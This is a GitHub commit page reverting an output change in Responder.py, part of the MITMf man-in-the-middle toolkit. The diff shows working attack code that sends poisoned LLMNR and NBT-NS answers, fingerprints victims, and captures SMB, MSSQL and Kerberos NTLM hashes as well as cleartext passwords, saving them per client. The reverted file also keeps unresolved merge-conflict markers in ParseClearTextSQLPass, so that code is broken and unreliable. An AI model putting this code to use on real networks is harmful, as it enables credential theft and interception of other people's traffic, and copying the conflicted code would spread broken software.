github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-19 13:10:03 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Revert "fixed Responder plugin output"

Browse source 
This reverts commit cd9a16de55.

Reverting since this commit caused a lot of stuff to not work in the plugin (??)
This commit is contained in:
byt3bl33d3r 2015-03-30 18:13:21 +02:00
commit 3c6a9fe89d
2 changed files with 179 additions and 180 deletions
Download patch file Download diff file Expand all files Collapse all files

3
config/mitmf.cfg
View file

@ -2,8 +2,7 @@
[MITMf] [MITMf]
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
#(assuming you config file is in the default directory)
args='' args=''
#Required BeEF and Metasploit options #Required BeEF and Metasploit options

356
libs/responder/Responder.py
View file

@ -291,19 +291,17 @@ class NB(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
Message = "%s [Analyze mode: NBT-NS] OS: %s Client Version: %s is looking for: %s Service requested is: %s"%(self.client_address[0], Finger[0], Finger[1], Name, NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
logger3.warning(Message) logger3.warning(Message)
except Exception: except Exception:
Message = "%s [Analyze mode: NBT-NS] is looking for : %s Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
logger3.warning(Message) logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
else: else:
Message = "%s [Analyze mode: NBT-NS] is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
logger3.warning(Message) logger3.warning(Message)
if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False: if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False:
@ -319,17 +317,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
DnsCache.getInstance().setCustomRes(Name.lower()) DnsCache.getInstance().setCustomRes(Name.lower())
@ -340,17 +338,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -369,17 +367,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
p#rint '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) == False: if RespondToSpecificName(RespondToName) == False:
DnsCache.getInstance().setCustomRes(Name.lower()) DnsCache.getInstance().setCustomRes(Name.lower())
@ -390,17 +388,17 @@ class NB(BaseRequestHandler):
Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
else: else:
pass pass
@ -460,17 +458,17 @@ def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80") PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None: if PDC is not None:
l.append('[Analyze mode LANMAN]:') l.append('[Analyze mode LANMAN]:')
l.append('Domain detected on this network:') l.append('[!]Domain detected on this network:')
for x in PDC: for x in PDC:
l.append(' -'+x) l.append(' -'+x)
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00") SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None: if SQL is not None:
l.append('SQL Server detected on Domain %s:'%(Domain)) l.append('[!]SQL Server detected on Domain %s:'%(Domain))
for x in SQL: for x in SQL:
l.append(' -'+x) l.append(' -'+x)
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff") WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None: if WKST is not None:
l.append('Workstations/Servers detected on Domain %s:'%(Domain)) l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
for x in WKST: for x in WKST:
l.append(' -'+x) l.append(' -'+x)
else: else:
@ -537,12 +535,11 @@ def BecomeBackup(data,Client):
Role = NBT_NS_Role(data[45:48]) Role = NBT_NS_Role(data[45:48])
Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain) Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
if AnalyzeMode: if AnalyzeMode:
Message1=RAPThisDomain(Client,Domain) Message1=RAPThisDomain(Client,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message1): if PrintLLMNRNBTNS(AnalyzeFilename,Message1):
#print Message1 print Message1
logger3.warning(Message1) logger3.warning(Message1)
logger3.warning(Message) logger3.warning(Message)
except: except:
@ -557,12 +554,11 @@ def ParseDatagramNBTNames(data,Client):
Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2) Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2)
if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.": if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
#print Message print Message
logger3.warning(Message)
if AnalyzeMode: if AnalyzeMode:
Message1=RAPThisDomain(Client,Domain) Message1=RAPThisDomain(Client,Domain)
if PrintLLMNRNBTNS(AnalyzeFilename,Message1): if PrintLLMNRNBTNS(AnalyzeFilename,Message1):
#print Message1 print Message1
logger3.warning(Message1) logger3.warning(Message1)
logger3.warning(Message) logger3.warning(Message)
except: except:
@ -676,10 +672,10 @@ def ParseSMBHash(data,client):
writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal
outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt")
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("SMB-NTLMv1 hash captured from : ",client) print "[+]SMB-NTLMv1 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
WriteData(outfile,writehash,User+"::"+Domain) WriteData(outfile,writehash,User+"::"+Domain)
logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
if NthashLen > 60: if NthashLen > 60:
outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt")
@ -692,10 +688,10 @@ def ParseSMBHash(data,client):
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:] writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:]
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("SMB-NTLMv2 hash captured from : ",client) print "[+]SMB-NTLMv2 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
WriteData(outfile,writehash,User+"::"+Domain) WriteData(outfile,writehash,User+"::"+Domain)
logging.warning('SMB-NTLMv2 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash))
#Parse SMB NTLMv1/v2 #Parse SMB NTLMv1/v2
def ParseLMNTHash(data,client): def ParseLMNTHash(data,client):
@ -706,33 +702,33 @@ def ParseLMNTHash(data,client):
Bcc = struct.unpack('<H',data[63:65])[0] Bcc = struct.unpack('<H',data[63:65])[0]
if NthashLen > 25: if NthashLen > 25:
Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] Hash = data[65+LMhashLen:65+LMhashLen+NthashLen]
logging.warning('SMB-NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client))
outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt")
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var) Username, Domain = tuple(var)
Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper()
if PrintData(outfile,Username+"::"+Domain): if PrintData(outfile,Username+"::"+Domain):
logging.warning("SMB-NTLMv2 hash captured from :",client) print "[+]SMB-NTLMv2 hash captured from :",client
logging.warning("SMB-NTLMv2 complete hash is :",Writehash) print "[+]SMB-NTLMv2 complete hash is :",Writehash
ParseShare(data) ParseShare(data)
WriteData(outfile,Writehash, Username+"::"+Domain) WriteData(outfile,Writehash, Username+"::"+Domain)
logging.warning('SMB-NTLMv2 complete hash is :%s'%(Writehash)) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash))
if NthashLen == 24: if NthashLen == 24:
logging.warning('SMB-NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client))
outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt")
pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2]
var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]]
Username, Domain = tuple(var) Username, Domain = tuple(var)
writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal
if PrintData(outfile,Username+"::"+Domain): if PrintData(outfile,Username+"::"+Domain):
logging.warning("SMB-NTLMv1 hash captured from : ",client) print "[+]SMB-NTLMv1 hash captured from : ",client
logging.warning("SMB complete hash is :", writehash) print "[+]SMB complete hash is :", writehash
ParseShare(data) ParseShare(data)
WriteData(outfile,writehash, Username+"::"+Domain) WriteData(outfile,writehash, Username+"::"+Domain)
logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash))
logging.warning('SMB-NTLMv1 Username:%s'%(Username)) logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username))
logging.warning('SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain))
except Exception: except Exception:
raise raise
@ -748,7 +744,7 @@ def IsNT4ClearTxt(data):
if PassLen > 2: if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
#print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) print "[SMB]Clear Text Credentials: %s:%s" %(User,Password)
logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password))
#SMB Server class, NTLMSSP #SMB Server class, NTLMSSP
@ -989,11 +985,11 @@ class KerbTCP(BaseRequestHandler):
if KerbHash: if KerbHash:
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
if PrintData(Outfile,KerbHash): if PrintData(Outfile,KerbHash):
logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) print "[+]MSKerbv5 hash captured from : ", self.client_address[0]
#print "[+]MSKerbv5 complete hash is :", KerbHash print "[+]MSKerbv5 complete hash is :", KerbHash
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
WriteData(Outfile,KerbHash, KerbHash) WriteData(Outfile,KerbHash, KerbHash)
logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
except Exception: except Exception:
raise raise
@ -1006,11 +1002,11 @@ class KerbUDP(BaseRequestHandler):
if KerbHash: if KerbHash:
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
if PrintData(Outfile,KerbHash): if PrintData(Outfile,KerbHash):
logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) print "[+]MSKerbv5 hash captured from : ", self.client_address[0]
#print "[+]MSKerbv5 complete hash is :", KerbHash print "[+]MSKerbv5 complete hash is :", KerbHash
Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt")
WriteData(Outfile,KerbHash, KerbHash) WriteData(Outfile,KerbHash, KerbHash)
logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash))
except Exception: except Exception:
raise raise
@ -1037,13 +1033,13 @@ def ParseSQLHash(data,client):
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt")
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("MSSQL NTLMv1 hash captured from :",client) print "[+]MSSQL NTLMv1 hash captured from :",client
logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)
WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain) WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain)
logging.warning('MsSQL NTLMv1 hash captured from :%s'%(client)) logging.warning('[+]MsSQL NTLMv1 hash captured from :%s'%(client))
logging.warning('MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('MSSQL NTLMv1 Domain is :%s'%(Domain)) logging.warning('[+]MSSQL NTLMv1 Domain is :%s'%(Domain))
logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal))
if NthashLen > 60: if NthashLen > 60:
DomainLen = struct.unpack('<H',data[36:38])[0] DomainLen = struct.unpack('<H',data[36:38])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0] NthashOffset = struct.unpack('<H',data[32:34])[0]
@ -1057,13 +1053,13 @@ def ParseSQLHash(data,client):
outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv2-Client-"+client+".txt") outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv2-Client-"+client+".txt")
Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper() Writehash = User+"::"+Domain+":"+NumChal+":"+Hash[:32].upper()+":"+Hash[32:].upper()
if PrintData(outfile,User+"::"+Domain): if PrintData(outfile,User+"::"+Domain):
logging.warning("MSSQL NTLMv2 Hash captured from :",client) print "[+]MSSQL NTLMv2 Hash captured from :",client
logging.warning("MSSQL NTLMv2 Complete Hash is : ", Writehash) print "[+]MSSQL NTLMv2 Complete Hash is : ", Writehash
WriteData(outfile,Writehash,User+"::"+Domain) WriteData(outfile,Writehash,User+"::"+Domain)
logging.warning('MsSQL NTLMv2 hash captured from :%s'%(client)) logging.warning('[+]MsSQL NTLMv2 hash captured from :%s'%(client))
logging.warning('MSSQL NTLMv2 Domain is :%s'%(Domain)) logging.warning('[+]MSSQL NTLMv2 Domain is :%s'%(Domain))
logging.warning('MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) logging.warning('[+]MSSQL NTLMv2 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')))
logging.warning('MSSQL NTLMv2 Complete Hash is : %s'%(Writehash)) logging.warning('[+]MSSQL NTLMv2 Complete Hash is : %s'%(Writehash))
def ParseSqlClearTxtPwd(Pwd): def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5','')) Pwd = map(ord,Pwd.replace('\xa5',''))
@ -1082,11 +1078,16 @@ def ParseClearTextSQLPass(Data,client):
PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen]) PwdStr = ParseSqlClearTxtPwd(Data[8+PwdOffset:8+PwdOffset+PwdLen])
UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le') UserName = Data[8+UsernameOffset:8+UsernameOffset+UsernameLen].decode('utf-16le')
if PrintData(outfile,UserName+":"+PwdStr): if PrintData(outfile,UserName+":"+PwdStr):
<<<<<<< HEAD
logging.warning("MSSQL PlainText Password captured from :",str(client)) logging.warning("MSSQL PlainText Password captured from :",str(client))
logging.warning("MSSQL Username: %s Password: %s"%(UserName, PwdStr)) logging.warning("MSSQL Username: %s Password: %s"%(UserName, PwdStr))
=======
print "[+]MSSQL PlainText Password captured from :",client
print "[+]MSSQL Username: %s Password: %s"%(UserName, PwdStr)
>>>>>>> parent of cd9a16d... fixed Responder plugin output
WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr) WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr)
logging.warning('MSSQL PlainText Password captured from :%s'%(client)) logging.warning('[+]MSSQL PlainText Password captured from :%s'%(client))
logging.warning('MSSQL Username: %s Password: %s'%(UserName, PwdStr)) logging.warning('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr))
def ParsePreLoginEncValue(Data): def ParsePreLoginEncValue(Data):
@ -1194,7 +1195,7 @@ def IsICMPRedirectPlausible(IP):
dnsip.extend(ip[1:]) dnsip.extend(ip[1:])
for x in dnsip: for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False: if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
print "| |_ [Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) print "[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x)
else: else:
pass pass
@ -1223,16 +1224,17 @@ class LLMNR(BaseRequestHandler):
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
Message = "%s [Analyze mode: LLMNR] OS: %s Client Version: %s is looking for : %s"%(self.client_address[0],Finger[0],Finger[1],Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1])
logger3.warning(Message) logger3.warning(Message)
except Exception: except Exception:
Message = "%s [Analyze mode: LLMNR] is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
logger3.warning(Message) logger3.warning(Message)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
logger3.warning(Message) print Message
else: else:
Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name)
if PrintLLMNRNBTNS(AnalyzeFilename,Message): if PrintLLMNRNBTNS(AnalyzeFilename,Message):
print Message
logger3.warning(Message) logger3.warning(Message)
if DontRespondToSpecificHost(DontRespondTo): if DontRespondToSpecificHost(DontRespondTo):
@ -1254,17 +1256,17 @@ class LLMNR(BaseRequestHandler):
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
@ -1276,17 +1278,17 @@ class LLMNR(BaseRequestHandler):
Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name)
logging.warning(Message) logging.warning(Message)
if PrintLLMNRNBTNS(Log2Filename,Message): if PrintLLMNRNBTNS(Log2Filename,Message):
#print Message print Message
logger2.warning(Message) logger2.warning(Message)
if Is_Finger_On(Finger_On_Off): if Is_Finger_On(Finger_On_Off):
try: try:
Finger = RunSmbFinger((self.client_address[0],445)) Finger = RunSmbFinger((self.client_address[0],445))
#print '[+] OsVersion is:%s'%(Finger[0]) print '[+] OsVersion is:%s'%(Finger[0])
#print '[+] ClientVersion is :%s'%(Finger[1]) print '[+] ClientVersion is :%s'%(Finger[1])
logging.warning('OsVersion is:%s'%(Finger[0])) logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('ClientVersion is :%s'%(Finger[1])) logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception: except Exception:
logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass pass
